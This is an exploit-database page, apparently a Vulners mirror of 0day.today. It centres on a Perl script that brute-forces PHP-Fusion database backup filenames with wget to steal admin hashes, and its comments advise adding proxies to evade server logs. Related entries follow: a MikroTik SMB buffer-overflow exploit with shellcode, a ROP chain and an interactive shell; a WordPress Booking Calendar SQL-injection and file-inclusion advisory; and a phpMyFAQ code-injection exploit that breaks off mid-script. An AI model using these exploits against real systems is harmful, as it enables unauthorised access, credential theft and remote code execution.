Search...

PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit

2005-06-25T00:00:00

ID 1337DAY-ID-139
Type zdt
Reporter Easyex
Modified 2005-06-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
PHP-Fusion &lt;= 6.00.105 Accessible Database Backups Download Exploit
===================================================================





 #!/usr/bin/perl
 ######################################################
 #  D A R K   A S S A S S I N S   C R E W   2 0 0 5   #
 ######################################################
 # Dark Assassins - http://dark-assassins.com/        #
 # Visit us on IRC @ irc.tddirc.net #DarkAssassins    #
 ######################################################
 # phpfusiondb.pl; Version 0.1 22/06/05               #
 # PHP-Fusion db backup proof-of-concept by Easyex    #
 # Database backup vuln in v6.00.105 and below        #
 ######################################################
 # Description: When a db (database) backup is made   #
 # it is saved in /administration/db_backups/ on 6.0  #
 # and on 5.0 it is saved in /fusion_admin/db_backups/#
 # The backup file can be saved in 2 formats: .sql or #
 # .sql.gz and is hidden by a blank index.php file but#
 # can be downloaded client-side, The filename is for #
 # example : backup_2005-06-22_2208.sql.gz so what we #
 # can do is generate 0001 to 9999 and request the    #
 # file and download it. If a db file is found an     #
 # attacker can get the admin hash and crack  it or   #
 # retrieve other sensitive information from the db!  #
 ######################################################

 # 9999 requests to the host is alot, And would get noticed in the server log!
 # If you re-coded your own script with proxy support you would be fine.
 # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly   
 # backup the php-fusiondatabase.

 my $wget='wget';

 my $count='0';

 my $target;

 if (@ARGV &lt; 4)
{
 print "\n";
 print "Welcome to the PHP-Fusion db backup vulnerability\n";
 print "Coded by Easyex from the Dark Assassins crew\n";
 print "\n";
 print "Usage: phpfusiondb.pl &lt;host&gt; &lt;version&gt; &lt;file&gt; &lt;extension&gt;\n";
 print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n";
 print "\n";
 exit();
}

 my $host = $ARGV[0];
 my $ver = $ARGV[1];
 my $file = $ARGV[2];
 my $extension = $ARGV[3];

 if ($ver eq "6") {
       $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder
 }

 if ($ver eq "5") {
       $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder
}

 print "\n";
 print "Welcome to the PHP-Fusion db backup vulnerability\n";
 print "Coded by Easyex from the Dark Assassins crew\n";
 print "\n";

 print "Host: $host\n";
 print "Directory: $dir\n";
 print "File: $file + 0001 to 9999\n";
 print "Extension: $extension\n";
 print "\n";
 print "Attempting to find a db backup file on $host\n";

 for($count=0;$count&lt;9999;$count++) {

    $target=$host.$dir.$file.sprintf("%04d", $count).$extension;

    system("$wget $target");
 }



#  0day.today [2018-03-03]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-139", "bulletinFamily": "exploit", "title": "PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit", "description": "Exploit for unknown platform in category web applications", "published": "2005-06-25T00:00:00", "modified": "2005-06-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/139", "reporter": "Easyex", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-03T03:35:12", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:45:32", "value": 3.6}}, "hash": "68e8a2f5104f0ac2be2b4e5edd838a770eb0646ced1f5c30d885c7e9cb8c925f", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f872c457a848a124d8dbcf4abd1d80a0", "key": "href"}, {"hash": "15decd73b99156076f1cf7fbfc3abf1d", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "109c4f038ba21f3bb58a7da692cdd0b3", "key": "sourceHref"}, {"hash": "15decd73b99156076f1cf7fbfc3abf1d", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "83eeb8711945913fc013f598f200302e", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "9242e54907efdcfe3eb4cac572fafd96", "key": "title"}, {"hash": "bc044d4bec3f06d876cf902f1748d6b4", "key": "reporter"}], "history": [], "href": "http://0day.today/exploit/description/139", "id": "1337DAY-ID-139", "lastseen": "2016-04-20T01:45:32", "modified": "2005-06-25T00:00:00", "objectVersion": "1.0", "published": "2005-06-25T00:00:00", "references": [], "reporter": "Easyex", "sourceData": "===================================================================\r\nPHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit\r\n===================================================================\r\n\r\n\r\n\r\n\r\n\r\n #!/usr/bin/perl\r\n ######################################################\r\n # D A R K A S S A S S I N S C R E W 2 0 0 5 #\r\n ######################################################\r\n # Dark Assassins - http://dark-assassins.com/ #\r\n # Visit us on IRC @ irc.tddirc.net #DarkAssassins #\r\n ######################################################\r\n # phpfusiondb.pl; Version 0.1 22/06/05 #\r\n # PHP-Fusion db backup proof-of-concept by Easyex #\r\n # Database backup vuln in v6.00.105 and below #\r\n ######################################################\r\n # Description: When a db (database) backup is made #\r\n # it is saved in /administration/db_backups/ on 6.0 #\r\n # and on 5.0 it is saved in /fusion_admin/db_backups/#\r\n # The backup file can be saved in 2 formats: .sql or #\r\n # .sql.gz and is hidden by a blank index.php file but#\r\n # can be downloaded client-side, The filename is for #\r\n # example : backup_2005-06-22_2208.sql.gz so what we #\r\n # can do is generate 0001 to 9999 and request the #\r\n # file and download it. If a db file is found an #\r\n # attacker can get the admin hash and crack it or #\r\n # retrieve other sensitive information from the db! #\r\n ######################################################\r\n\r\n # 9999 requests to the host is alot, And would get noticed in the server log!\r\n # If you re-coded your own script with proxy support you would be fine.\r\n # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly \r\n # backup the php-fusiondatabase.\r\n\r\n my $wget='wget';\r\n\r\n my $count='0';\r\n\r\n my $target;\r\n\r\n if (@ARGV < 4)\r\n{\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n print \"Usage: phpfusiondb.pl <host> <version> <file> <extension>\\n\";\r\n print \"Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\\n\";\r\n print \"\\n\";\r\n exit();\r\n}\r\n\r\n my $host = $ARGV[0];\r\n my $ver = $ARGV[1];\r\n my $file = $ARGV[2];\r\n my $extension = $ARGV[3];\r\n\r\n if ($ver eq \"6\") {\r\n $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder\r\n }\r\n\r\n if ($ver eq \"5\") {\r\n $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder\r\n}\r\n\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n\r\n print \"Host: $host\\n\";\r\n print \"Directory: $dir\\n\";\r\n print \"File: $file + 0001 to 9999\\n\";\r\n print \"Extension: $extension\\n\";\r\n print \"\\n\";\r\n print \"Attempting to find a db backup file on $host\\n\";\r\n\r\n for($count=0;$count<9999;$count++) {\r\n\r\n $target=$host.$dir.$file.sprintf(\"%04d\", $count).$extension;\r\n\r\n system(\"$wget $target\");\r\n }\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/139", "title": "PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit", "type": "zdt", "viewCount": 106}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:45:32"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "00157601768b634735774d15ccd18f9e"}, {"key": "href", "hash": "bca49b87b47130c26393f7e65537e693"}, {"key": "modified", "hash": "15decd73b99156076f1cf7fbfc3abf1d"}, {"key": "published", "hash": "15decd73b99156076f1cf7fbfc3abf1d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bc044d4bec3f06d876cf902f1748d6b4"}, {"key": "sourceData", "hash": "1ef4229e749c4c601dbc29d884b994d5"}, {"key": "sourceHref", "hash": "b6f80cb0d5f1cd629592c4a17e97db2d"}, {"key": "title", "hash": "9242e54907efdcfe3eb4cac572fafd96"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "eb16723f511ed13c0978e52c0b7539dd42a479eb2ae75a4922ff06def2c7dd78", "viewCount": 106, "enchantments": {"vulnersScore": 2.8}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/139", "sourceData": "===================================================================\r\nPHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit\r\n===================================================================\r\n\r\n\r\n\r\n\r\n\r\n #!/usr/bin/perl\r\n ######################################################\r\n # D A R K A S S A S S I N S C R E W 2 0 0 5 #\r\n ######################################################\r\n # Dark Assassins - http://dark-assassins.com/ #\r\n # Visit us on IRC @ irc.tddirc.net #DarkAssassins #\r\n ######################################################\r\n # phpfusiondb.pl; Version 0.1 22/06/05 #\r\n # PHP-Fusion db backup proof-of-concept by Easyex #\r\n # Database backup vuln in v6.00.105 and below #\r\n ######################################################\r\n # Description: When a db (database) backup is made #\r\n # it is saved in /administration/db_backups/ on 6.0 #\r\n # and on 5.0 it is saved in /fusion_admin/db_backups/#\r\n # The backup file can be saved in 2 formats: .sql or #\r\n # .sql.gz and is hidden by a blank index.php file but#\r\n # can be downloaded client-side, The filename is for #\r\n # example : backup_2005-06-22_2208.sql.gz so what we #\r\n # can do is generate 0001 to 9999 and request the #\r\n # file and download it. If a db file is found an #\r\n # attacker can get the admin hash and crack it or #\r\n # retrieve other sensitive information from the db! #\r\n ######################################################\r\n\r\n # 9999 requests to the host is alot, And would get noticed in the server log!\r\n # If you re-coded your own script with proxy support you would be fine.\r\n # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly \r\n # backup the php-fusiondatabase.\r\n\r\n my $wget='wget';\r\n\r\n my $count='0';\r\n\r\n my $target;\r\n\r\n if (@ARGV < 4)\r\n{\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n print \"Usage: phpfusiondb.pl <host> <version> <file> <extension>\\n\";\r\n print \"Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\\n\";\r\n print \"\\n\";\r\n exit();\r\n}\r\n\r\n my $host = $ARGV[0];\r\n my $ver = $ARGV[1];\r\n my $file = $ARGV[2];\r\n my $extension = $ARGV[3];\r\n\r\n if ($ver eq \"6\") {\r\n $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder\r\n }\r\n\r\n if ($ver eq \"5\") {\r\n $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder\r\n}\r\n\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n\r\n print \"Host: $host\\n\";\r\n print \"Directory: $dir\\n\";\r\n print \"File: $file + 0001 to 9999\\n\";\r\n print \"Extension: $extension\\n\";\r\n print \"\\n\";\r\n print \"Attempting to find a db backup file on $host\\n\";\r\n\r\n for($count=0;$count<9999;$count++) {\r\n\r\n $target=$host.$dir.$file.sprintf(\"%04d\", $count).$extension;\r\n\r\n system(\"$wget $target\");\r\n }\r\n\r\n\r\n\n# 0day.today [2018-03-03] #"}

{"result": {"zdt": [{"lastseen": "2018-03-20T01:19:38", "references": [], "description": "Exploit for hardware platform in category remote exploits", "edition": 1, "reporter": "CoreLabs", "published": "2018-03-16T00:00:00", "title": "MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T01:19:38", "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/", "value": 3.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7445"], "modified": "2018-03-16T00:00:00", "id": "1337DAY-ID-29995", "href": "https://0day.today/exploit/description/29995", "sourceData": "#!/usr/bin/env python\r\n \r\nimport socket\r\nimport struct\r\nimport sys\r\nimport telnetlib\r\n \r\nNETBIOS_SESSION_MESSAGE = \"\\x00\"\r\nNETBIOS_SESSION_REQUEST = \"\\x81\"\r\nNETBIOS_SESSION_FLAGS = \"\\x00\"\r\n \r\n# trick from http://shell-storm.org/shellcode/files/shellcode-881.php\r\n# will place the socket file descriptor in eax\r\nfind_sock_fd = \"\\x6a\\x02\\x5b\\x6a\\x29\\x58\\xcd\\x80\\x48\"\r\n \r\n# dup stdin-stdout-stderr so we can reuse the existing connection\r\ndup_fds = \"\\x89\\xc3\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\"\r\n \r\n# execve - cannot pass the 2nd arg as NULL or busybox will complain\r\nexecve_bin_sh = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n \r\n# build shellcode\r\nshellcode = find_sock_fd + dup_fds + execve_bin_sh\r\n \r\n# rop to mprotect and make the heap executable\r\n# the heap base is not being subject to ASLR for whatever reason, so let's take advantage of it\r\np = lambda x : struct.pack('I', x)\r\n \r\nrop = \"\"\r\nrop += p(0x0804c39d) # 0x0804c39d: pop ebx; pop ebp; ret; \r\nrop += p(0x08072000) # ebx -> heap base\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x080664f5) # 0x080664f5: pop ecx; adc al, 0xf7; ret; \r\nrop += p(0x14000) # ecx -> size for mprotect\r\nrop += p(0x08066f24) # 0x08066f24: pop edx; pop edi; pop ebp; ret; \r\nrop += p(0x00000007) # edx -> permissions for mprotect -> PROT_READ | PROT_WRITE | PROT_EXEC\r\nrop += p(0xffffffff) # edi -> gibberish\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; \r\nrop += p(0x0000007d) # ebp -> mprotect system call\r\nrop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret; \r\nrop += p(0xffffe42e) # 0xffffe42e; int 0x80; pop ebp; pop edx; pop ecx; ret - from vdso - not affected by ASLR\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x0) # edx -> zeroed out\r\nrop += p(0x0) # ecx -> zeroed out\r\nrop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; \r\nrop += p(0x08075802) # ebp -> somewhere on the heap that will (always?) contain user controlled data\r\nrop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;\r\nrop += p(0x0804e153) # jmp eax; - jump to our shellcode on the heap\r\n \r\noffset_to_regs = 83\r\n \r\n# we do not really care about the initial register values other than overwriting the saved ret address\r\nebx = p(0x45454545)\r\nesi = p(0x45454545)\r\nedi = p(0x45454545)\r\nebp = p(0x45454545)\r\neip = p(0x0804886c) # 0x0804886c: ret;\r\n \r\npayload = \"\\xff\" * offset_to_regs + ebx + esi + edi + ebp + eip + rop\r\nheader = struct.pack(\"!ccH\", NETBIOS_SESSION_REQUEST, NETBIOS_SESSION_FLAGS, len(payload))\r\nbuf = header + payload\r\n \r\ndef open_connection(ip):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((ip, 139))\r\n return s\r\n \r\ndef store_payload(s):\r\n print \"[+] storing payload on the heap\"\r\n s.send((NETBIOS_SESSION_MESSAGE + \"\\x00\\xeb\\x02\") * 4000 + \"\\x90\" * 16 + shellcode)\r\n \r\ndef crash_smb(s):\r\n print \"[+] getting code execution\"\r\n s.send(buf)\r\n \r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 2:\r\n print \"%s ip\" % sys.argv[0]\r\n sys.exit(1)\r\n \r\n s = open_connection(sys.argv[1])\r\n store_payload(s)\r\n \r\n # the server closes the first connection, so we need to open another one\r\n t = telnetlib.Telnet()\r\n t.sock = open_connection(sys.argv[1])\r\n crash_smb(t.sock)\r\n print \"[+] got shell?\"\r\n t.interact()\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29995"}, {"lastseen": "2018-01-03T19:12:22", "references": [], "description": "WordPress Booking Calendar plugin versions 7.1, 7.0, and below suffer from remote SQL injection and local file inclusion vulnerabilities.", "edition": 1, "reporter": "Neven Biruski", "published": "2017-12-20T00:00:00", "title": "WordPress Booking Calendar 7.0 / 7.1 SQL Injection / Local File Inclusion Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-03T19:12:22", "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-12-20T00:00:00", "id": "1337DAY-ID-29275", "href": "https://0day.today/exploit/description/29275", "sourceData": "Advisory Title: WordPress Booking Calendar Plugin Multiple Vulnerabilities\r\nAdvisory URL: http://www.defensecode.com/advisories.php\r\nSoftware: WordPress Booking Calendar plugin\r\nLanguage: PHP\r\nVersion: 7.0/7.1 and below\r\nVendor Status: Vendor contacted, updates released\r\nRelease Date: 2017/12/13\r\nRisk: Medium\r\n\r\n\r\n\r\n1. General Overview\r\n===================\r\nDuring the security audit of Booking Calendar plugin for WordPress\r\nCMS, multiple vulnerabilities were discovered using DefenseCode\r\nThunderScan application source code security analysis platform.\r\n\r\nMore information about ThunderScan is available at URL:\r\nhttp://www.defensecode.com\r\n\r\n\r\n2. Software Overview\r\n====================\r\nBooking Calendar plugin - described by the authors as the ultimate\r\nbooking system for online reservation and availability checking\r\nservice for your site.\r\n\r\nAccording to wordpress.org, it has more than 40,000 active installs.\r\n\r\nHomepage:\r\nhttps://wordpress.org/plugins/booking/\r\nhttp://wpbookingcalendar.com/\r\nhttps://wordpress.org/plugins/booking/#developers\r\n\r\n\r\n3. Vulnerability Description\r\n============================\r\nDuring the security analysis, ThunderScan discovered SQL injection and\r\nLocal file inclusion vulnerabilities in Booking Calendar WordPress\r\nplugin.\r\n\r\nThe easiest way to reproduce the SQL injection vulnerabilities is to\r\nsend the specified parameter to the provided URL while being logged in\r\nas administrator or another user that is authorized to access the\r\nplugin settings page. Users that do not have full administrative\r\nprivileges could abuse the database access the vulnerabilities provide\r\nto either escalate their privileges or obtain and modify database\r\ncontents they were not supposed to be able to.\r\n\r\nBy requesting a specially crafted URL, the attacker can cause remote\r\nserver to execute a php file of his choosing. Although the user\r\nrequesting the URL has to be logged into the WordPress administrative\r\nconsole, the attacker can cause the administrator to request such a\r\nURL by using various social engineering/phishing approaches. Specified\r\nfile will be interpreted by php interpreter, and any valid php code\r\nwill indeed be executed. If the php installation on server has\r\n\"allow_url_include=1\" configuration option set, this attack can be\r\nexpanded to execute a php file from any remote URL. If the php version\r\nis less than 5.3.4, the \".php\" that gets appended to the end of the\r\nfile name attacker chose can be omitted by adding a null character\r\n(\"%00\") to the requested URL, and enable the attacker to execute any\r\nfile, regardless of the extension.\r\n\r\nDue to the CSRF token needed to perform the attack the risk is lowered\r\nto medium.\r\n\r\n3.1. SQL injection\r\n Function: $wpdb->query()\r\n Variable: $_POST[ \"booking_id\" ];\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n File: booking\\lib\\wpbc-ajax.php\r\n ---------\r\n 152 $booking_id = $_POST[ \"booking_id\" ];\r\n 153 $approved_id = explode('|',$booking_id);\r\n ...\r\n 162 $approved_id_str = join( ',', $approved_id);\r\n ...\r\n 165 if ( false === $wpdb->query( $wpdb->prepare( \"UPDATE\r\n{$wpdb->prefix}bookingdates SET approved = %s WHERE booking_id IN\r\n({$approved_id_str})\", $is_approve_or_pending ) ) ){ \r\n ---------\r\n \r\n3.2. SQL injection\r\n Function: $wpdb->query()\r\n Variable: $_POST[ \"booking_id\" ];\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n Vulnerable code snippets:\r\n File: booking\\lib\\wpbc-ajax.php\r\n ---------\r\n 110 $id_of_new_bookings = $_POST[ \"booking_id\" ];\r\n 111 $arrayof_bookings_id = explode('|',$id_of_new_bookings);\r\n ...\r\n 114 wpbc_update_number_new_bookings( $arrayof_bookings_id,\r\n$is_new , $user_id );\r\n ---------\r\n File: booking\\lib\\wpdev-booking-functions.php\r\n ---------\r\n 1468 function wpbc_update_number_new_bookings(\r\n$id_of_new_bookings, $is_new = '0' , $user_id = 1 ){\r\n ...\r\n 1485 $update_sql = \"UPDATE {$wpdb->prefix}booking AS bk SET\r\nbk.is_new = {$is_new} WHERE bk.booking_id IN ( {$id_of_new_bookings} ) \";\r\n ...\r\n 1487 if ( false === $wpdb->query( $update_sql ) ) {\r\n ---------\r\n\r\n3.3 PHP file inclusion\r\n Function: include()\r\n Variable: $_POST['captcha_chalange']\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n Vulnerable code snippets:\r\n File: booking\\core\\lib\\wpbc-booking-new.php\r\n ---------\r\n 127 if (! wpbc_check_CAPTCHA( $_POST['captcha_user_input'],\r\n$_POST['captcha_chalange'], $bktype ) ) {\r\n ...\r\n 19 function wpbc_check_CAPTCHA( $the_answer_from_respondent,\r\n$prefix, $bktype ) {\r\n ...\r\n 23 $correct = $captcha_instance->check($prefix,\r\n$the_answer_from_respondent);\r\n ---------\r\n File: wp-content\\plugins\\booking\\js\\captcha\\captcha.php\r\n ---------\r\n 139 function check( $prefix, $response ) {\r\n ...\r\n 141 include( $this->tmp_dir . $prefix . '.php' );\r\n ---------\r\n \r\n\r\n4. Solution\r\n===========\r\nVendor resolved the security issues. All users are strongly advised to\r\nupdate WordPress Booking Calendar plugin to the latest available\r\nversion.\r\n\r\n\r\n5. Credits\r\n==========\r\nDiscovered by Neven Biruski using DefenseCode ThunderScan source code\r\nsecurity analyzer.\r\n\r\n \r\n6. Disclosure Timeline\r\n======================\r\n2016/11/15 Vulnerabilities discovered\r\n2017/04/04 Vendor contacted\r\n2017/04/04 Vendor responded - 7.0 already fixed SQL injection vulns\r\n2017/04/04 Update released for LFI (7.1)\r\n2017/12/13 Advisory released to the public\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29275"}, {"lastseen": "2018-01-10T05:11:37", "references": [], "description": "phpMyFAQ version 2.9.9 suffers from an issue where an administrative account can execute arbitrary code on the server by modifying LANG_CONF[main.metaDescription].", "edition": 1, "reporter": "tomplixsee", "published": "2017-11-19T00:00:00", "title": "phpMyFAQ 2.9.9 Code Injection Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-10T05:11:37", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/", "value": 5.4}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-11-19T00:00:00", "id": "1337DAY-ID-29018", "href": "https://0day.today/exploit/description/29018", "sourceData": "# Exploit Title: [PHPMYFAQ 2.9.9 Code Injection]\r\n# Google Dork: [NA]\r\n# Date: [Nov 6 2017]\r\n# Exploit Author: [tomplixsee]\r\n# Author blog : [cupuzone.wordpress.com]\r\n# Vendor Homepage: [ http://www.phpmyfaq.de]\r\n# Software Link: [http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip]\r\n# Version: [2.9.9] \r\n# Tested on: [Ubuntu Server 16.04, PHP 7.0.22]\r\n# CVE : [NA]\r\n\r\n\r\nHow to reproduce\r\n1. login to administrative page (example http://vbox-ubuntu-server.me/phpmyfaq/admin/ ) as an admin or any user with right access to edit translation\r\n2. open page configuration->interface translation (assume you use english language). fyi, edit translations only active if folder phpmyfaq/lang is writable, so make sure the folder is writable\r\n3. choose indonesia (or another language) to edit\r\n4. choose page 14 (in example)\r\n5. choose variable LANG_CONF[main.metaDescription]\r\n6. set phpinfo() as value\r\n7. change your languge to indonesia\r\n\r\n\r\nvulnerable code\r\non file admin/ajax.trans.php\r\n\r\n 43 case 'save_page_buffer':\r\n 44 /*\r\n 45 * Build language variable definitions\r\n 46 * @todo Change input handling using PMF_Filter\r\n 47 */\r\n 48 foreach ((array) @$_POST['PMF_LANG'] as $key => $val) {\r\n 49 if (is_string($val)) {\r\n 50 $val = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val);\r\n 51 $val = str_replace(\"'\", \"\\\\'\", $val);\r\n 52 $_SESSION['trans']['rightVarsOnly'][\"PMF_LANG[$key]\"] = $val;\r\n 53 } elseif (is_array($val)) {\r\n 54 /*\r\n 55 * Here we deal with a two dimensional array\r\n 56 */\r\n 57 foreach ($val as $key2 => $val2) {\r\n 58 $val2 = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val2);\r\n 59 $val2 = str_replace(\"'\", \"\\\\'\", $val2);\r\n 60 $_SESSION['trans']['rightVarsOnly'][\"PMF_LANG[$key][$key2]\"] = $val2;\r\n 61 }\r\n 62 }\r\n 63 }\r\n 64 \r\n 65 foreach ((array) @$_POST['LANG_CONF'] as $key => $val) {\r\n 66 // if string like array(blah-blah-blah), extract the contents inside the brackets\r\n 67 if (preg_match('/^\\s*array\\s*\$\\s*(\\d+.+)\\s*\$.*$/', $val, $matches1)) {\r\n 68 // split the resulting string of delimiters such as \"number =>\"\r\n 69 $valArr = preg_split(\r\n 70 '/\\s*(\\d+)\\s*\\=\\>\\s*/',\r\n 71 $matches1[1],\r\n 72 null,\r\n 73 PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY\r\n 74 );\r\n 75 $numVal = count($valArr);\r\n 76 if ($numVal > 1) {\r\n 77 $newValArr = [];\r\n 78 for ($i = 0; $i < $numVal; $i += 2) {\r\n 79 if (is_numeric($valArr[$i])) {\r\n 80 // clearing quotes\r\n 81 if (preg_match('/^\\s*\\\\\\\\*[\\\"|\\'](.+)\\\\\\\\*[\\\"|\\'][\\s\\,]*$/', $valArr[$i + 1], $matches2)) {\r\n 82 $subVal = $matches2[1];\r\n 83 // normalize quotes\r\n 84 $subVal = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $subVal);\r\n 85 $subVal = str_replace(\"'\", \"\\\\'\", $subVal);\r\n 86 // assembly of the original substring back\r\n 87 $newValArr[] = $valArr[$i].' => \\''.$subVal.'\\'';\r\n 88 }\r\n 89 }\r\n 90 }\r\n 91 $_SESSION['trans']['rightVarsOnly'][\"LANG_CONF[$key]\"] = 'array('.implode(', ', $newValArr).')';\r\n 92 }\r\n 93 } else { // compatibility for old behavior\r\n 94 $val = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val);\r\n 95 $val = str_replace(\"'\", \"\\\\'\", $val);\r\n 96 $_SESSION['trans']['rightVarsOnly'][\"LANG_CONF[$key]\"] = $val;\r\n 97 }\r\n 98 }\r\n 99 \r\n 100 echo 1;\r\n 101 break;\r\n 102 \r\n 103 case 'save_translated_lang':\r\n 104 \r\n 105 if (!$user->perm->checkRight($user->getUserId(), 'edittranslation')) {\r\n 106 echo $PMF_LANG['err_NotAuth'];\r\n 107 exit;\r\n 108 }\r\n 109 \r\n 110 $lang = strtolower($_SESSION['trans']['rightVarsOnly']['PMF_LANG[metaLanguage]']);\r\n 111 $filename = PMF_ROOT_DIR.'/lang/language_'.$lang.'.php';\r\n 112 \r\n 113 if (!is_writable(PMF_ROOT_DIR.'/lang')) {\r\n 114 echo 0;\r\n 115 exit;\r\n 116 }\r\n 117 \r\n 118 if (!copy($filename, PMF_ROOT_DIR.'/lang/language_'.$lang.'.bak.php')) {\r\n 119 echo 0;\r\n 120 exit;\r\n 121 }\r\n 122 \r\n 123 $newFileContents = '';\r\n 124 $tmpLines = [];\r\n 125 \r\n 126 // Read in the head of the file we're writing to\r\n 127 $fh = fopen($filename, 'r');\r\n 128 do {\r\n 129 $line = fgets($fh);\r\n 130 array_push($tmpLines, rtrim($line));\r\n 131 } while ('*/' != substr(trim($line), -2));\r\n 132 fclose($fh);\r\n 133 \r\n 134 // Construct lines with variable definitions\r\n 135 foreach ($_SESSION['trans']['rightVarsOnly'] as $key => $val) {\r\n 136 if (0 === strpos($key, 'PMF_LANG')) {\r\n 137 $val = \"'$val'\";\r\n 138 }\r\n 139 array_push($tmpLines, '$'.str_replace(array('[', ']'), array(\"['\", \"']\"), $key).\" = $val;\");\r\n 140 }\r\n 141 \r\n 142 $newFileContents .= implode(\"\\n\", $tmpLines);\r\n 143 \r\n 144 unset($_SESSION['trans']);\r\n 145 \r\n 146 $retval = file_put_contents($filename, $newFileContents);\r\n 147 echo intval($retval);\r\n 148 break;\r\n\r\n\r\n\r\n\r\nthe exploit\r\n-----------------------------------------------------------------\r\n\r\n\r\n#! /usr/bin/python\r\nimport sys, requests, argparse, readline\r\n \r\ndef main(argv):\r\n global url, user, password\r\n parser = argparse.ArgumentParser(description='PHPMYFAQ 2.9.9 Code Injection exploitation tool. author : tomplixsee')\r\n parser.add_argument('-u','--url', help='target url',required=True)\r\n parser.add_argument('-p','--password', help='password',required=True)\r\n parser.add_argument('-s','--user', 